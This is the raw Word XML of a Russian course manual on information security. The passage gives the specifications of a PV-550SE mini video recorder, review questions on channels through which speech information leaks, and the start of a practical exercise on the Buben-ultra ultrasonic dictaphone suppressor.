        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A45EE6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">В комплекте видеорегистратора </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC7BBF">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>PV</w:t>
      </w:r>
      <w:r w:rsidRPr="00A45EE6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">-550 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SE</w:t>
      </w:r>
      <w:r w:rsidRPr="00A45EE6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> нет карты памяти </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SDHC</w:t>
      </w:r>
      <w:r w:rsidRPr="00A45EE6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</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Технические характеристики видеорегистратора  PV-550SE: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Экран: TFT ЖК дисплей 2.5", разрешение 960x240;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Разрешение видео записи: 720х576, 720х480, 640х480;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Скорость записи: 15к/с, 25к/с, 30к/с; </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="69"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A45EE6">
        <w:t>Видео</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r w:rsidRPr="00A45EE6">
        <w:t>Аудио</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A45EE6">
        <w:t>вход</w:t>
      </w:r>
      <w:r w:rsidRPr="00B45DB0">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> [Av In]: PAL / SECAM;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Выход питания 5V из [Av In] 2,5</w:t>
      </w:r>
      <w:r>
        <w:t>мм для мини микро видеокамер;</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Формат записи: *.AVI ;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lastRenderedPageBreak/>
        <w:t>Нет встроенной памяти;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Запись на карту памяти SDHC до 32Gb (опция);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Режим - виде</w:t>
      </w:r>
      <w:r>
        <w:t>о запись до окончания записи;</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Режим - видео запись по программному Датчику Движения;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Режим - видео запись по кругу / циклическая;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Функция показа и записи даты на экране;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Дистанционное включение и начало записи с помощью проводной кнопки (и выключение);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Встроенный микрофон;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Встроенный динамик;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Функция Диктофона;</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Видео выход: NTSC / PAL;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Вибросигнал, подтверждение работы;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Звуковой сигнал - бипер, подтверждение работы;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Функция фотографирования;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Просмотр записанной информации на встроенном экране или компьютере, или телевизоре;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Соединение с компьютером, через USB 2.0;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Сменная аккумуляторная батарея: Li-ion 3,7V, 1000mA;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Металлический корпус, без защиты от статического электричества;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Размер: 80 x 52 x 23 мм;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Вес с аккумулятором: 96 г;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Непрерывная работа и зарядка от адаптера DC 5V , подключенный к  AC 220V</w:t>
      </w:r>
      <w:r>
        <w:t>;</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Меню на русском языке;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t>Описание на русском языке.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00A45EE6" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A45EE6">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>В комплекте DVR мини регистратора PV-550SE:</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Видео регистратор PV-550SE. </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Аккумулятор Li-Ion 3.7V.  </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Сетевой адаптер/зарядка 5V от АС220V.  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0"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Кнопка для быстрого</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> включения и записи, на проводе</w:t>
      </w:r>
      <w:r w:rsidRPr="00A45EE6">
        <w:t>.  </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ИК дистанционный пульт управления видеорегистратором PV-550SE.</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Соединительный провод для подключения внешнего видео / аудио сигнала.</w:t>
      </w:r>
      <w:r>
        <w:t>  </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USB провод для подключения к компьютеру.</w:t>
      </w:r>
      <w:r>
        <w:t>  </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Чехол для ношения на поясе.</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t>Описание на русском языке. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00A45EE6" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1134"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A45EE6">
        <w:t>Индивидуальная упаковка под оборудование.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00386DFD" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2630"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00F57D29" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2630"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Контрольные вопросы для защиты практической работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00F57D29" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="2630"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F57D29">
        <w:t>Что входит в комплект DVR мини регистратора PV-550SE?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00F57D29" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="2630"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F57D29">
        <w:t>Для чего нужен регистратор PV-550SE?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00C2668F">
      <w:pPr>
        <w:pStyle w:val="ab"/>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="2630"/>
        </w:tabs>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:contextualSpacing w:val="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00F57D29">
        <w:lastRenderedPageBreak/>
        <w:t>Какие технические характеристики видеорегистратора PV-550SE вам известны?</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD712C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>(П)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="2630"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="2630"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B721A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Вопросы для защиты  работы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007B721A" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="2630"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B721A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Вопрос 1. Акустоэлектрические каналы утечки речевой информации;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="007B721A" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="2630"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B721A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Вопрос 2. Оптико-электронный технический канал утечки речевой информации;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="2630"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007B721A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Вопрос 3. Параметрические технические каналы утечки речевой информации; (П)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="2630"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="2630"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="000F2694" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:bookmarkStart w:id="96" w:name="_Toc508055973"/>
      <w:bookmarkStart w:id="97" w:name="_Toc3808635"/>
      <w:r w:rsidRPr="000F2694">
        <w:t>Практическая работа №</w:t>
      </w:r>
      <w:r>
        <w:t>16</w:t>
      </w:r>
      <w:bookmarkStart w:id="98" w:name="_Toc508055974"/>
      <w:bookmarkEnd w:id="96"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000F2694">
        <w:t>Подавитель диктофонов Бубен-ультра</w:t>
      </w:r>
      <w:bookmarkEnd w:id="97"/>
      <w:bookmarkEnd w:id="98"/>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="2630"/>
        </w:tabs>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="000F2694" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="2630"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F2694">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Цель:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> исследовать установку и подключение п</w:t>
      </w:r>
      <w:r w:rsidRPr="000F2694">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>одавител</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>я</w:t>
      </w:r>
      <w:r w:rsidRPr="000F2694">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> диктофонов Бубен-ультра</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="000F2694" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="993"/>
          <w:tab w:val="left" w:pos="2630"/>
        </w:tabs>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000F2694">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Теоретическая часть</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:right="147" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ЗАПРЕЩАЕТСЯ подносить ультразвуковые излучатели на расстояние ближе 70 см к уху, при количестве излучателей до</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 6 штук, ближе 120см к уху, при </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>количестве излучателей от 6 до 24 штук.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ЗАПРЕЩАЕТСЯ пользоваться прибором детям младше 18 лет.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:right="2583" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ЗАПРЕЩАЕТСЯ внесение изменений во встроенные цепи защиты и питания. ЗАПРЕЩАЕТСЯ применение устройства не по назначению.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:ind w:right="2583" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ЗАПРЕЩАЕТСЯ эксплуатация приборов в условиях отличных от технических требований. ЗАПРЕЩАЕТСЯ эксплуатация неисправных приборов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>ОТЛИЧИТЕЛЬНЫЕ ОСОБЕННОСТИ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>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Постоянная мощность ультразвуковой помехи</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>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Количество излучателей 12 и 24 штуки</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>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Угол излучения до 110 градусов</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>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Полностью закамуфлированное исполнение</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>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Разные варианты акустической ткани</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>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Комплектуется проводным и беспроводным (брелком) пультом дистанционного управления</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>В отличии от предыдущих приборов полностью закамуфлирован под цилиндрические колонки, со стороны невозможно определить, что в них встроены пьезо излучатели. Каркас обтянут акустической тканью. Тип ткани можно выбрать при заказе</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:right="323" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>из шести стандартно применяемых. Для удобного подключения из колонки выходит двух метровый многожильный провод. В комплекте поставки присутствуют все необходимые для установки и подключения материалы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>НАЗНАЧЕНИЕ ИЗДЕЛИЯ.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:right="141" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Прибор предназначен для полного и (или) частичного подавления полезного звукового сигнала при попытке записи на мобильные или стационарные записывающие устройства, радио и проводные специальные технические средства, выносные микрофоны посредством генерации трех типов помех.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA6BC1">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>А именно:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0"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помехи в ультразвуковом диапазоне, воздействующей непосредственно на мембрану микрофона;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="00B45DB0" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0"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сложной звуковой помехи, воздействующей на АРУ записывающего устройства, тем самым увеличивая воздействие УЗП;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B45DB0" w:rsidRPr="00DA6BC1" w:rsidRDefault="002C1237" w:rsidP="00B45DB0">
      <w:pPr>
        <w:pStyle w:val="ad"/>
        <w:ind w:left="0" w:right="636" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="ru-RU" w:eastAsia="ru-RU"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251687424" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>232410</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>398780</wp:posOffset>
                </wp:positionV>
